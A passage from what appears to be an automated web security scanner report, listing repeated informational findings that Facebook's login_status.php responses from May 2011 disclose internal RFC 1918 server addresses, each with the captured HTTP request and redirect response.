3Df1ea1d5d78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df143798ff%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ea1d5d78&origin=http%3A%2F%2Faol.sportingnews.com%2Ff110f82284&relation=parent&transport=postmessage&frame=f16efcbeb
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.68.111
X-Cnection: close
Date: Thu, 05 May 2011 02:05:21 GMT
Content-Length: 0

20.164. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.140.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9f2b9a3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1853bb678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe1c606f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfff1bc7e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a034a798%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fff1bc7e8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3025efcb8&relation=parent&transport=postmessage&frame=f3ce7949c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.25
X-Cnection: close
Date: Thu, 05 May 2011 11:42:07 GMT
Content-Length: 0

20.165. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.108.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ebc35c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cdf4eca4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1423356ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b1dbe64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb43fce3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff168ca146%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ebccb7bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3b1dbe64&origin=http%3A%2F%2Faol.sportingnews.com%2Ff168ca146&relation=parent&transport=postmessage&frame=f1ebccb7bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.123
X-Cnection: close
Date: Thu, 05 May 2011 02:18:01 GMT
Content-Length: 0

20.166. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.134.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df350c5b264%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34d6ac9f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31b992c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df179b0fcd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a9fdce78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d4ef228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f047e444&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f179b0fcd&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8d4ef228&relation=parent&transport=postmessage&frame=f2f047e444
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.134.120
X-Cnection: close
Date: Thu, 05 May 2011 01:08:29 GMT
Content-Length: 0

20.167. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.153.21

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d62909ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df226e646a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c693437c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df123801544%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12056d3b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3289058c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13c54703c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f123801544&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3289058c4&relation=parent&transport=postmessage&frame=f13c54703c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.21
X-Cnection: close
Date: Thu, 05 May 2011 02:12:29 GMT
Content-Length: 0

20.168. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.74.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df174f0ecd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37efdf01%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34f256c48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b3caa33c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ae9e34c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff63f56b28%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df388264c08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1b3caa33c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff63f56b28&relation=parent&transport=postmessage&frame=f388264c08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.74.27
X-Cnection: close
Date: Thu, 05 May 2011 01:53:04 GMT
Content-Length: 0

20.169. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.193.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11dd7c8cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd23d5764%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2639845b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e940e90%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df204435c7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1169c01d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c4f1a838&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1e940e90&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1169c01d&relation=parent&transport=postmessage&frame=f2c4f1a838
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.193.37
X-Cnection: close
Date: Thu, 05 May 2011 01:25:15 GMT
Content-Length: 0

20.170. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.144.126

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31705a9b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34c5fb6e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27c3efee4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c6c9824%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cf347778%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27ddecc7&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1c6c9824&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1f93db008&relation=parent&transport=postmessage&frame=f27ddecc7
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.144.126
X-Cnection: close
Date: Thu, 05 May 2011 01:15:24 GMT
Content-Length: 0

20.171. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.45.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3685194ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c5df5e9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3085624e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b7fa1fe4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2aaa6ea6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8d390844%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ddcc193&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2b7fa1fe4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8d390844&relation=parent&transport=postmessage&frame=f1ddcc193
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.45.63
X-Cnection: close
Date: Thu, 05 May 2011 00:59:53 GMT
Content-Length: 0

20.172. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.139.119

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16940ad7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bf1256c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff11b3d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2616e5be4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33d4df48c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff377786e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3891ed05&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
